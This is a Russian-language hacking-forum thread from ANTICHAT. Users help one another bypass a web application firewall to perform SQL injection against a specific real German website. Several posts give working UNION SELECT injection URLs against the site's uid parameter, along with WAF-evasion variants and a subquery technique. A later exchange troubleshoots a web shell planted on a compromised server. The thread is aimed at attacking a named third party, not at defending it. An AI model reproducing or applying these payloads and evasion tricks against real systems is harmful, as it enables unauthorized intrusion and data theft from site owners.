ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.01.2020, 04:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
7175
Репутация:
8
|
|
Сообщение от DezMond™
DezMond™ said:
↑
помогите ваф обойти
Код:
Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
Если только WAF беспокоит, то:
Код:
Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+select(wafbypass),2,3,4,5,6,7,8,9,10,11,12,13,14+--+
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+and+union+select,1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
|
|
|
|
24.01.2020, 06:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
3935
Репутация:
3
|
|
Сообщение от DezMond™
DezMond™ said:
↑
помогите ваф обойти
Код:
Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
Либо крутим подзапрос в uid. uid=(if((select 1),10,0)), либо другое значение искать...
|
|
|
|
24.01.2020, 09:51
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от Pop-Xlop
Pop-Xlop said:
↑
Если только WAF беспокоит, то:
Код:
Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+select(wafbypass),2,3,4,5,6,7,8,9,10,11,12,13,14+--+
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+and+union+select,1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
ну естественно синтаксис соблюдать, с ошибками он и так проходит
|
|
|
24.01.2020, 10:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от DezMond™
DezMond™ said:
↑
помогите ваф обойти
Код:
Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
После + поставь select
|
|
|
|
24.01.2020, 11:06
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от BabaDook
BabaDook said:
↑
После + поставь select ваф срабатывает, по этому не полный запрос) при чём ваф работает когда запрос выполняется без ошибок, даже если в конце убрать --
|
|
|
|
24.01.2020, 18:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
6588
Репутация:
0
|
|
dell
|
|
|
|
31.01.2020, 22:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
4684
Репутация:
0
|
|
Сообщение от o314um
o314um said:
↑
столкнулся с ситуацией, когда есть веб шелл, есть правки на файлы и правки вносятся. Но когда загружаешь страницу из http - правок, что внес - нет. так же и с файлами. Заливаешь текстовый файл, а при открытии - 404. Права стоят верные. Через веб шелл смотришь - файл есть.либо правки в существующих. А сайт работает как и работал.
Что тут может быть? Файловый кеш сервера + метка модификации файла не меняется. Либо не на тот сервак правки вносите, такое тоже бывает)
|
|
|
|
01.02.2020, 16:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
7175
Репутация:
8
|
|
Уверены, что не балансер?
|
|
|
|
01.02.2020, 20:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
9857
Репутация:
0
|
|
|
|
|
|
01.02.2020, 21:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Почему тогда у этих многих не спросить?
Лично я не вижу там ничего
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
